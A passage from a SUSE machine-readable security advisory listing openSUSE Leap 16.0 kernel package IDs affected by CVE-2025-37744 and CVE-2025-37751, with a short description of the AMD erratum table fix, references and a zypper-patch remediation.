"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
